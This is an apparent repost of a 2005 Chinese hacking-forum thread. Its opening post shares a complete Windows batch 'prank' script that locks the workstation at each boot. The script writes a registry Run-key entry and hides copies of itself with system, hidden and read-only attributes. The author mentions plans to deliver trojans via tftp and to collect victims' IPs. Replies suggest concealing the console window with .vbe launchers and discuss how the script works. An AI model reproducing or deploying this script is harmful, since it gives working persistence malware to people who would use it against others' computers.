议题提交：无名
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

花了2天时间,写了段1KB的小批处理,希望对大家有用
此批处理用处:可以锁定计算机,恶作剧
由于明天就开学了哈,所以没有时间去完善了,我还有许多关于此批处理的想法,现在简要说几点
1.用tftp来传木马
2.将中了此批处理的的IP都发到一个地方(此想法以解决)
以下是代码:
@echo off
rem wuminger bomb 1.00  wuming@hackbase.com
echo rundll32.exe user32.dll,LockWorkStation>>wm.bat
echo for %%%f in (*.bat) do wm.bat %%%f  in (*.bat) do wm.bat %%%f in (*.bat) do wm.bat %%%f>>wm.bat
echo Windows Registry Editor Version 5.00 > wm.reg
echo.>> wm.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> wm.reg
echo.>> wm.reg
echo "wmbat"="d:\\wm.bat" >>wm.reg
regedit /s wm.reg
copy wm.bat d:\
attrib d:\wm.bat +h +r +s
attrib wm.bat +h +r +s
attrib wm.reg +h +r +s
wm.bat

XPSP2测试成功
希望各位能够完善一下
想要和我交流以下的可以发邮件到
wuming@hackbase.com

这样，每次开机跳黑框~
稍微有点常识的就会检查了
到安全模式不就很快可以查到？？？？

嘿嘿是有框，但是可以用vbe文件来调用这个批处理就Ok了~~~~~

真的好用的话~大家记得改改邮件地址~呵呵~

黑框？不如做个特殊的.比如
cmd /q bat.bat [s:34]  [s:37]

a.bat 内容 dir >3.txt
然后在CMD 下运行 cmd /q a.bat 发现并没有3.txt生成！
也就是说a.bat没有被运行~~
不知kevin是怎么实现的呢？

C:\>cmd /?
启动 Windows XP 命令解释程序一个新的实例

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
   [[/S] [/C | /K] string]

/C    执行字符串指定的命令然后终断
/K    执行字符串指定的命令但保留
/S    在 /C 或 /K 后修改字符串处理(见下)
/Q    关闭回应
/D    从注册表中停用执行 AutoRun 命令(见下)
/A    使向内部管道或文件命令的输出成为 ANSI
/U    使向内部管道或文件命令的输出成为 Unicode
/T:fg  设置前景/背景颜色(详细信息，请见 COLOR /?)
/E:ON  启用命令扩展(见下)
/E:OFF  停用命令扩展(见下)
/F:ON  启用文件和目录名称完成字符 (见下)
/F:OFF  停用文件和目录名称完成字符(见下)
/V:ON  将 ! 作为定界符启动延缓环境变量扩展。如: /V:ON 会
      允许 !var! 在执行时允许 !var! 扩展变量 var。var 语法
      在输入时扩展变量，这与在一个 FOR 循环内不同。
/V:OFF  停用延缓的环境扩展。

https://www.xfocus.net/bbs/index.php?act=ST&f=3&t=46390
转一贴...其实我也没测试(其实没测试就没发言权 -_-#)

里面好象看到了代码罐头.他应该成的似乎

经过测试，的确不能执行~
虽然没跳黑框~

C:\1>dir
驱动器 C 中的卷是 WINXP
卷的序列号是 195B-1406

C:\1 的目录

2005-10-30  00:10   <DIR>       .
2005-10-30  00:10   <DIR>       ..
2005-10-29  22:17           10 a.bat
          1 个文件         10 字节
          2 个目录  3,020,677,120 可用字节

C:\1>type a.bat
dir >3.txt
C:\1>cmd /q a.bat
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\1>dir
驱动器 C 中的卷是 WINXP
卷的序列号是 195B-1406

C:\1 的目录

2005-10-30  00:10   <DIR>       .
2005-10-30  00:10   <DIR>       ..
2005-10-29  22:17           10 a.bat
          1 个文件         10 字节
          2 个目录  3,020,673,024 可用字节

C:\1>

attrib wm.bat +h +r +s
这个是什么意思，小弟我不懂，请大哥们指点一下？

cmd /q
既然关闭回应了是不是就没得回应了哦？
我测试了也不能成功

echo for %%%f in (*.bat) do wm.bat %%%f in (*.bat) do wm.bat %%%f in (*.bat) do wm.bat %%%f>>wm.bat
这里有3个%,按里说只应该有一个的,可是不晓得咋回事,我放一个的话,生成的wm.bat里面就没%号,只有放3个%才可以勉强斗出来,整个语句感觉虽然混乱,不过生成的wm.bat是工整的
用了^也没用，高手知道原因吗?

引用:

下面是引用songlin820于2005-10-30 01:09发表的:
attrib wm.bat +h +r +s
这个是什么意思，小弟我不懂，请大哥们指点一下？

给文件加系统属性只读属性隐藏属性